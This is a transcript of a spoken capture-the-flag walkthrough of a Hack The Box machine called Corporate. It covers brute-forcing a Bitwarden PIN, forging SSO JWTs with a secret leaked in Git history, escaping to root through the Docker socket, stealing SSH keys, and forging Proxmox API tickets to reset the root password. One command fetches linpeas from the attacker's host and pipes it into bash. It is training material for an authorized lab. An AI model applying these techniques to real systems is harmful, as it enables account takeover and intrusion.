up 2 directories. I'm going to move my existing Firefox directory into a backup. And then I'm just going to do a tar xjvf on the backup file, right? So we do corporate Mozilla. That's going to create a new Firefox directory. And I'm going to execute it with the profile manager flag. This way, when Firefox starts up, it'll ask me what profile I want to load. And I'm going to select default release first. And if this one doesn't have any history, then I'm going to switch to the other Firefox profile, right? Because there's 2 Firefox profiles, And we want the one with the history because that's where the BitWarden profile is. So we have that. So let's now go and install BitWarden. I'm going to click on Manage Extensions, search for BitWarden, and let's add it to Firefox. Add. And this should pop up asking for a PIN code. So this is what we have to brute force. So let's go and Google BitWarden PIN brute force. Go over to Google. And let's see, is there a GitHub? Right here. I think this is it. This may not be the repository I saw. This is one that will work. We have to edit the source. But when I was recording the video, I found a much better program. I haven't actually ran it yet because this one we have to edit it and manually put like the email and everything else. But I'm going to go back and maybe I need a space. Try this. There we go. This is a much better one. And it also has a better way to extract all the data, right? So if we go here, we can say, hey, Firefox, if we type about debugging, let's try that. And then we want to click on this Firefox, go to the extension and click inspect, and then go to the console. And if we go to the console and type this, we probably have to say allow pasting or something. Maybe that did not work. I thought it would. Click on the BitWarden. I am not sure why that's not working. They have instructions on disk as well, but I never actually did it on this method. I just saw this GitHub page and thought this would be a cool thing to show, but curse of the demo gods maybe. And we have the brute forcer. Now there's one cool thing about Rust. Well, one thing you should know is if you were compiling this manually. So let's do a git clone real quick on this so we can build it. If you just do, was it cargo build? It's going to build it in debug mode, which is infinitely slower than it being in release mode. So I'm going to build it in both, and then we're going to run a time just so you can see the difference. So that way, if you ever build Rust apps on your own, and you're getting like it being slower than you expect, you know, maybe I should make sure this is in release mode, right? So we're going to do this. Once it's done, we can run the tool, right? So we go to target, and I'm going to go to release, and then BitWarden pin, and we need, what is it? -- email. Let's go cat crypto notes. Email is Elwin Jones. And then I think it's -H. Do they say on this easily? -E for encrypt. And M is email. We can do -M and -E. And I'm going to paste this and see if it works. Panic. Invalid byte. That's not good. I am not sure why this is not working. Elwin Jones 2. Does it begin with 2 dot? It does. They had it in double quotes. I'm going to try that real quick. I don't think that's the issue. I wonder if this is the invalid byte. That does not look right. Huh. I screwed something up when I did those quotes. I guess it does not like double quotes for that. because there's probably a quote somewhere in here that it used. Okay, so it's probably processing that backtick when I do double quotes. So I'm going to switch to the other brute forcer, and we'll see if that one works. Because that looks like it's supposed to be base 64, which would be really odd. Let's go back to the data, actually. Here's the data. Hex dump, data 0, pin. Is there a backtick here? Where was that backtick? 2D. So DJGE. DJGE. I don't see a backtick. So that must be how we were extracting the data. That is bizarre. F is equal to open. We'll call this hash.out. We need to write binary. F.write. Let's do this. F.write. Get rid of the hex dump. That should be fine. F.close. And then if we cat hash, where are we on this Python? There, cat hash.out. Okay. Let's do strings encoding little endian. Grab this. We don't have the backtick. So however we grab that out, I don't know what we screwed up, but we screwed something up. Let's go back here. Let's do v crypto notes. Let's fix this. We definitely want to edit this. Take that out. Force the write. Okay. So let's go back there. And I'm going to do the better hash. There we go. That is what I expected. Awesome. And we see that cracked relatively quickly. So I'm going to copy this, and we're going to go in the debug as well. And we're going to crack it with both. So let's go to BitWarden pin, target, debug, and we're going to run both. And we'll see one cracks extremely quick. You can see how many hashes per second release was going. Debug says it's going fast, but it's like 4, 5, 6. You can see it's like half a hash a second. That is incredibly slow compared to release, right? I think this will take like probably 6 or 7 minutes, maybe even longer, estimated 8 hours. But that's just 8 hours to do the entire key space since it's going sequentially 0, 2, is it? Where is the pin found? Yeah, 0, 2 is pretty early. So it's not going to actually take a full 8 hours, but you can see how slow that is. I'm going to go and insert the pin, click on unlock. And if we go over to Vault, we can see we have Git, and it's going to get.corporate.htb. So this is what we have to access. And there's a piece of this box that I don't exactly like that took me a little while to figure out because I can't access Git this way. And we can't also access it from the workstation. If I can remember which terminal, it's probably the one that says SSH there. I would expect I could do like curl, and we can manually do the host header, right? Was it get.corporate.htb on 10.9.0.1? Like I would expect this should return the page, but we just get the forbidden. But if we run this on my host, so let me just go up here. We'll do this. We actually get the HTML. So what's happening here is the OpenResty server is configured to only allow the 10.8 subnet access to Git, not the 10.9 subnet, which is where the workstation exists. So let's do 10.9.0.1. That's going to be Git corporate HTB. And we have to make sure we remove it from the 10.10.11 one. So now in Firefox, when we go to get corporate HTTP, we're still getting forbidden. I'm going to do Control-Shift-R to force a refresh. And there we go. We get access to Git. We can do sign in. And we already knew his password, but we have the one-time PIN. That's going to be the unique thing. So we'll do Elwin Jones. And then the password, corporate starter 0404-1987. Try to log in. And then it wants this PIN code. And if this doesn't work, make sure your computer's time is in sync. You can either just like do a date command here and then do it on your machine, or you could get it from the actual banner on, or the headers on the web server, right? Because the date's leaked here. So just make sure you're within like 15 seconds of the host so your TOTP works, and then you get logged into the Git server. And there's really two things we can do from this. We can either look for vulnerabilities in the code and try to exploit it, which would land us on 10.9.0.1, or we can pillage it looking for any type of secret that may be in a commit. Now, this is a very tedious process looking through all the commits manually. So what I want to do is get all these on my local host, and then I can just grep and for strings, right? So that's what I'm going to do. I'm going to go into Git T, into the settings, and we're going to add our SSH key here. So this way we can just clone all the repositories to our box. So we'll just do key name SSH and let us cat.ssh idrsa.pub, grab this key, put it in. And we should be able to clone repos now. So let's test this out. Let's go to support, and then we can clone this. So I'm going to make a directory called source, go init, get clone, and it looks like it is cloning just fine. So let's go and get our people and corporate SSO. So our people, and then corporate SSO as well. And when I was doing the box the first time, my first thought was, let's find an automated tool to scan all this. And Trufflehog is normally my go-to, but I don't think it finds anything. Let's just get the release and see if it will find anything on the latest. So I'm going to download this. Let's do AMD 64. Copy link. Where is it? wget. So let's do atar xjvf on, is it just xvf on Trufflehog? And now we should be able to do Trufflehog, get file, and specify each of these directories. So we can do our people first. And we see unverified secrets 0. We can also pipe this to JQ, which makes it a little bit prettier. Or maybe not, because it has that. But we have unverified secrets and verified secrets at 0. So it did not find anything. Let's try some other ones. So we can do corporate SSO. See if it finds anything here. Unverified secret 0. Let's try support. And again, we have nothing found through an automated tool. So when I was doing the box, I just manually looked through commits and eventually had found it. I think if we went to like our people, looked at package.json, this is one of the files I would typically look at and go to history. Then we'd see it. If we just look through these, we eventually find one that has a JWT secret here. And I was curious on a better way to search this, right? I thought Trufflehog would find this, but it didn't. So I was searching like, let's see, search Git for secrets. I think this search will bring up the blog post I want. Maybe this top one or this. Let's see. Get secrets, scan. This does not look like it. That's talking about Trufflehog. regex entropy false. I don't think that's it. That's definitely not it. This is it, probably. This gray corner. And this has a bunch of handy scripts, but this one really caught my eye. This git grep feature and doing all revisions. So let's go into one of these and do our people. I'm going to paste this. And what do we want our search pattern to be? I'm going to do secret because that's a common one. And we know I already showed it. I'm going to do -I to make it case insensitive. And then we can see all the time secret has appeared in the source code. And then this one time right here, we have JWT secret as this. So we have to think back, what can we do with a JWT secret? Well, let's see. Do we have a good one right here? This is what the JWT currently contains when we log in. So if we do echo, paste this, JQ dot, we can now forge this. So we could remove require current password equals true. And then what this should do is when we go to the password thing, not require us to enter the current password. So if we do that and combine it with changing the username to be someone else, we can now change someone's password, right? Because we can create a cookie that looks like them, remove require current password, go to the password change portal and change the password. And we can also change the role. So what do we want to do what do we accomplish by doing that, I guess is my question. Let's go back to where we have SSH, if I can find it right here. So if we can impersonate any user we want, we could log into other people's workstation, right? So I'm going to cat etsy past WD to see what other users are on the box. And we don't even see Elwin. And that's because it's through some type of LDAP that is in Etsy SSSD, but we can't view that. There is a command called GetEnt, and then we can do GetEnt Etsy, or I think it's just GetEnt past WD. And does this show us more users? It does not. Let's see. Group. Is it groups? Let's do GetEnt group IT. So we can list all members of groups easily. So we have Elwin Mills, Elwin Jones, etc., right? So we can change this to become another group. What group do we want to become part of? Well, in this step, we have to enumerate the box to find anything else that's valuable. What if we just do GetEnt group? Does this list all the groups? Sysadmin. I don't see IT here. No. GetEnt H. -- help. No service usage. That doesn't help. Maybe we can specify it by numerical. So GetEnt group 503. Whoops. There it is. And that works. Awesome. So 500 is sysadmin. Is 409 anything? It is not. So we can do 500, 501, 502, 503, 4, 5, 6, and enumerate this way. So we could do find /-group sysadmin. They can probably just sudo on the box. Sysadmin owns my user.txt. Interesting enough. Let's see, is there anything by finance? Finance. Nothing. And let's do engineer. Interesting. We can access the Docker socket file. So my first guess is let's try becoming a sysadmin. And then secondly, if that doesn't work, we can probably just switch to an engineer and then execute this Docker socket. So let's go to 500. And let's try to become, we'll do Stevie Rosenbaum. So let us grab our corporate SSO. And I'm going to go to jwt.io. we will paste our thing here. I'm going to say our role is going to be sysadmin. And then we need to update our name and email. So I'm going to copy this. And we can put it here. And I'm going to do the casing just like they have it. And ID. What is Stevie's ID? GetEnt user Stevie Rosenbaum. I thought that was how I did it. ID Stevie Rosenbaum. There we go. 5007. So 007. We can change this to false. And then we want to sign this. So where was our signing key? Is that this window? That is not. Our people. We can grab this. I guess we have to hope that this dev secret is still valid. We never actually validated it. You could validate it before you edit the whole JWT. You could just test to make sure it's valid. I'm pretty sure it is. So we grab this and let us update our JWT. Or we can just log. No, we can't log in. We just have to go to SSO corporate HTTP. Let's just do it in a new window. And then this is where we put the token. So storage. Let's add corporate SSO. The value is that. Make sure the path is set to just slash. Refresh. Go to password reset. And I'm going to change the password to password. We can't change the password to high privileged accounts apparently. So let's change our user. And we're going to go to, what is it? One of the engineers. So that was group 502, I think. And we can say ID. We'll do Arc Ryan. This is going to be ID 5042. So go back to Firefox. 5042. Arc Ryan. And it's an engineer, right? Yes. Okay. Grab this. Cookies. Change that. Refresh. I'm going to change the password to password. And it looks like it's been changed. So theoretically, we should now be able to do SSH arc Ryan at 10904. Type in password. Does not look like that worked. Let's see. If I click on our people, let's make sure we're the user we think we are. Corporate SSO. Paste that. Log in. Okay. That does look fine. Password reset. Let's just do password 1 like that. set change. Okay. I'm not sure exactly what happened. Maybe I typoed on that login form, but here we go. We get logged in as ArcRyan, and we have access to the Docker sock, right? If I just do groups, I am a member of engineer, and was it run docker.sock? Yes, we can access, we can write to the socket. That is the key piece. We have write access. So let's try running Docker. I'm going to do a docker ps-a to list running containers, and we don't have anything. We can do images to show saved images on the box, and it looks like Docker is pretty much completely unconfigured. Now, this lab doesn't have internet, so we can't just do like a Docker pull Alpine here because it can't talk to the registry. So let's go do that on our local host, and then we will import it. I'm just going to go to a new pane. Let's do Docker pull Alpine. And the reason why everyone likes using Alpine is because it's a super small image. It's really like tiny. So it makes it easy to copy around. So I'm going to do Docker save Alpine on the latest to alpine.tar. And let's do a du-hs to see how big this is. It's only 8 megs, right? So let's do, we can probably just copy alpine.tar to www because I think I have a web server already running. Let's go to the SSH session, wget 10.10.14.8, 8000 alpine.tar. It's going to download that. And now we can do a docker load -i alpine.tar. And now we can docker images. We see it's there. Let's do a run. And we're going to mount the slash of my host to /mount of the Docker image. And let's just call it Alpine. And go to bash or sh. We can go, we don't even have bash in Alpine. Go in mount, and we have it. So if we do chroot on this, now we are root on the box, and this is the VM. So if we wanted to, we could go into SSH and then drop a new key and then SSH as root just to have a cleaner terminal. Let's do SSH keygen -file, and I'll call this corporate cat corporate.pub. Let's grab this key. V authorize keys. We can paste ours in. And now if we do sh-i corporate, then root at 10.9.0.4. This should let us in. There we go. So now we're not in the chrooted environment. I guess it's a little bit cleaner. I'm not exactly positive, but let's see. What do we want to do from root? The first thing that comes to mind is going in the SSSD config, because this is how it talks to the LDAP server for all this to magically work. If we look at it, we can see there is the auth token this, and we have the auto bind user. So what I'm going to do is try to SSH with this account. So I'm going to SSH auto bind at 10.9.0.1 and see if that auth token works. I'm just pasting it there to confirm that is my clipboard, and it did not. The other thing we can do is probably just switch to any user we want, right? If we do su, was it ArcRyan as a user, we can magically become them. So what I want to do is become a sysadmin. And the sysadmin was group 500. So we can do GetEnt group 500. And we have to do 500 because if we type sysadmin, sysadmin's also a Linux group of 1000, and that has no users in it. But 500 is from LDAP. And we have 2 users, Amy and Stevie. So let's go and su to see if we can switch to Amy. And now this will auto mount Amy's home directory. And if we do a lsla, there is a SSH directory and an id.rsa and also a config. If we look at the config, it uses the user sysadmin. If we cat id.rsa, we have the key. So I'm going to save this key, and we're going to see if we can SSH to 10.9.0.1 with this. So v sysadmin, paste this, delete that trailing line break, chmod 600. And we probably should have named that like sysadmin.rsa or something, but that's fine. sh-i sysadmin at 10901. And we get logged into the main box. So normally sysadmin can run sudo, so that's going to be the first thing I try. But we need to know the sysadmin's password. And since we used a SSH key to get in, we do not know the password for sysadmin. I'm going to just run linpeas next. So we're going to copy opt-peas, linpeas into www, and we're going to see what linpeas has to find. So curl 10.10.14.8, 8000, linpeas.sh. Type it over to bash. And I'm going to pause the video while this runs. It shouldn't take too long, probably 2 to 3 minutes. And now that linpeas is done, let's go over the results. I'm just going to copy this so we can quickly jump back. So searching for passwords doesn't look like there's anything. No history file, hidden files. We do see things like varlog PVE. This is going to be related to Proxmox. We also have PVE cluster. Searching, that's normal. And looking at backup files, we have some interesting ones. We have var backups Proxmox corporate. There's some Ansible stuff here. So we should probably look at, oh wait, this is user lib Proxmox stuff. What is this? We got a backup script.j2. That does not look standard. Let's see. I think I may just copy this to a text file so we can go over it. When I was originally doing the box, I did not see that Ansible stuff. So let's take a look. Let's see, v notes. We can just paste that. Grep Ansible notes. -i. There we go. What is this J2 script? Let's see, all the passwords look like they're going to be in variables. I don't see this being related to the box. This is probably just something that Proxmox itself puts out. I don't know. But let's look at the other backups. So if we cat notes, where was the actual Proxmox backup? var backups. So if we go to var backups and list, we can see two things that stand out. All these, I say they don't stand out because it's just standard backup things, right? But these are not. Like if we could get a backup of the D package status, that doesn't really buy us anything. However, this Proxmox backup corporate, that is huge. So let's go ahead and download these two files. I'm going to take the lazy route like I normally do. We're just going to stand up a HTTP server here. So we'll do that on 9001. Python 3-m 9001. Okay. So let's do a wget http 10.901 9001 and download this. And I also want to get this PVE host. So once that one's done, we will download the second one. I can probably just do that here. wget http 10.901 9001. Save that. Okay, we got both those files, and let's take a look. Make dir backups, go in here, and we can do a tar xjvf. Or is it xvf? To extract that. And then we have var temp, Proxmox, and a few tars. So let's do for I in ls star.tar, do tar xf I, done. So now we have a list of all those files. If we go into Etsy, we have the backup of Etsy. If we cat, is there a shadow? There is. And we could try cracking these. I did before, and I could not crack either root or sysadmin. It's also in a really good hashing, so chances are we won't be able to crack those. It goes really slow. If it was like MD5 sum or something, that would hint at that's what we're supposed to do. We could look at other things here, but I don't know if there's really anything too interesting in Etsy. If we look, let's see, grep PV. There is a PVE directory, but it is empty. PVE would be Proxmox. If I do PR, there's nothing related to Proxmox there. So let's now go over into user, see what's here. User local bin, just a get t. Let's do var. Still in user. Nothing really too interesting here, I think. We could look at this config.db. And that is a lot of data. We do have authkey.key. So it looks like we have something interesting there. We should extract this. Let's see. Insert into tree. I do select star from tree. Okay. So that's the authkey.pub, and this is authkey.key. So we can grab this RSA key, and I'm actually just finding this for the first time. I think this auth key is also stored somewhere else. So we're going to go ahead and check that real quick. Let's see, v authkey.key. Let's paste what we had. Okay. So I'm going to go out of our temp and let's extract the other backup because this is where I saw it the first time. tar xvf pve host. So now the PVE host has the Etsy directory, and then in PVE, we have the auth key as well. So if we go to priv, we have authkey.key, and I want to say these may be the same file or the same thing. Let's see, gtrec, yeah, those are definitely the same. So you can either get the auth key out of that SQL backup database, or you can get it from the other backup file. So there's two places you can get this auth key. And what this auth key allows us to do is it allows us to actually forge tokens or forge cookies for the Proxmox API. So if we went and Googled, let's say like exploiting Proxmox vulnerabilities, if I can spell, that would be great. Let's see, is there one here? This is a really good post. There's a lot of data here. They do a lot of exploits in order to get the key. So if we scroll down, I'm not going to read this whole thing, but they have a vulnerability. Where does it show it better? They have a local file read vulnerability right here. So we can see they're doing a weird request, and then they're getting data back right here. So you get the log. It's reading off this file, and it gets the Etsy passwd. And essentially what in this blog post they're doing is using this to grab the priv key and then using that priv key to forge a cookie so you can actually access Proxmox. So we're just going to take the code that forges the cookie. So I'm going to grab this generate ticket real quick. And then let's do v test.py, and we can paste this. And we have to import a few things to use this. So let's see. We can just get rid of logging. Delete that, delete that, delete that, delete that. There we go. Let's see. They use temp file. They also use subprocess and base64. Okay, I think those are the modules we need. And what we want to do is change how we get this auth key path. So I'm just going to remove this. And we're going to specify the auth key file, because this OpenSSL is using file names anyways. So we'll just make sure this is always authkey.key. And now we can do a print generate ticket like this. And if we execute this, we have to import time. I missed one import, hopefully just one. There we go. So the other issue we have is this is PMG. This is the mail gateway. We're actually doing PVE. And I forget exactly what PVE stands for. It's probably virtual something. So let's Google PVE Proxmox virtual environment. So we want to change PMG because we're not talking to the PMG API. We're talking to the PVE API. And now we have a signed cookie. So if we go back to the blog post to see exactly how to interact with it, it's a simple HTTP request. Or we can just do, let's see. What if we can just Google Proxmox API? Here we go. Is this going to tell me exactly how to use it? Access. Password, let's see. It's the HTTP put. Yeah. API to JSON access password. So that is where we want to access. We have to stand up a SOCKS proxy because Proxmox is listening on port 8006, and that's not open to us, right? I wonder if it is on 10901. Is it 8006? It looks like it may be. Yeah, so we can actually access it on 8006. So that's how we'll access it. So we'll do HTTPS 10901 8006. If we couldn't do it this way, we could have switched over and did a SOCKS proxy with our SSH connection. And I don't feel like configuring the proxy, so I'm just going to go in Repeater tab. Let's take this. We're going to click up here, and we're going to change it manually. So 10901. There we go. And we just want to do a get on / for now. We don't need the host. Don't need any of this. What do we need? Cookies. Let's go back to the blog post. So they use cookie, accept language, and close. So let's make sure we have those headers. So cookie, PVE, auth, cookie, paste that. And I think they did an equals, right? Yeah. Okay. We send this. Oh, we don't even need those two other headers. So we get access here. If we didn't have this cookie, let's just delete it. Oh, we still get a 200 OK. What if we did API, where is it? API2 / JSON access password. We try accessing this. We have no ticket. We're going to put this here. And we have method get access password not implemented. So it wants a put request. And I got that because it's HTTP put right here. And we get permission denied, invalid CSRF token. And if we went back to how they're doing this exploit, the CSRF gets pulled by just doing a get on /. So right here, they're grabbing the CSRF prevention token right there. Where is the actual get? Let's see, request content get target URL. If we look what target URL is, it's on exploit. Let's just do a get on /. So we do git slash search for CSRF, and we have a CSRF prevention token. So we can just paste that there and then copy this. Okay. And we can go back to that put request. And I didn't mention it. This is a way to change passwords in Proxmox. This is, I think, the only way we can really escalate to get code execution. I'll go over into one other thing I played with other than this after we get it working. But we send this now. Since we have the CSRF prevention token, it just says property is missing that is not optional. So let's go and see what we need. It wants password and then the full user ID and name at realm format. So we can do password is equal to, let's just do password 1 like that. And user ID is equal to root at Pam. That is pulled right here. So if we run this, we have data null. And then if I go back here, let's do an SU, and I'm going to copy this password, paste it, and we change the password. So that is how to do the box. The other thing I was playing a lot with is when I was clicking around on the API, I had noticed underneath of nodes, there was a execute option. Where is that? A nodes execute. And I spent a lot of time trying to get this working, but it turns out execute probably is not what we expect, because we see it wants a JSON encoded array of commands, each with a arg, method, and path, right? But we could try playing with it. So in order to get this working, we need to know what node is. So if we go up to, let's see, is it cluster? And then where is it? There was a list somewhere. I do not see it. Cluster, config, API version, nodes. Let's see what this is. Let's do a git right here. This may be what I was looking at. Let's just copy it, change this to a git. And it's so nice the CSRF does not update. Unexpected content for git. There we go. Data, nothing. Maybe it's down here. Oh, resources. This is it, because we return like a node list. So we get cluster resources. So let's copy this. What do I have copied up to cluster? Paste. And this is going to list all the resources we have. So this is corporate workstation 4, right? And it's using QEMU as the type. And then we have a second VM just called corporate. And I don't know if it has a type. Oh, type is node. So this is going to be the virtual host. So we want to use corporate as the node name. Was that here? No, let's just go back over here. And we can do, let's do nodes config. So let's validate we have it correct. So I'm going to copy this, and then we're just going to do a corporate config. And it is a success. If we had something that did not exist, it'll probably say can't find node, right? It's waiting. Does it actually return anything if that's wrong? Yeah, host lookup name failed. So a node is definitely going to be corporate. And we want to try to run execute. So this piece confused me, like the data it has. So I just wanted to see if we can get it validated. We'll do corporate execute. And then how does it want this formatted, right? A JSON encoded array of commands. So it's probably going to be like a dictionary. And I wonder if we want commands is equal to. And then like that. or a list and then a dictionary. And then it wants args, we'll give it nothing. Method, we'll do a get, and then path. I'm going to try user bin who am I. Unexpected word content from method get. If I delete this, that did not work. Oh, this has to be a post request. So we'll do a post. Property is missing. I think this needs to be commands is equal to that. And there we go. So we have parameter validation failed. Let's see. Commands is not a valid array. 400. Type check. Oh, the field argument failed. So it's not a string. Let's just give it a blank thing. Not valid JSON. Maybe it's a dictionary. There we go. So we have passed all the validation, and we see no handler for nodes corporate user bin who am I. So at this point, I decided execute is definitely not like command execution. It's probably just like executing a webhook or something like that. So hope you enjoyed that little tidbit at the end of just playing with the API. That'll be the video though. So take care, and I will see you all next time.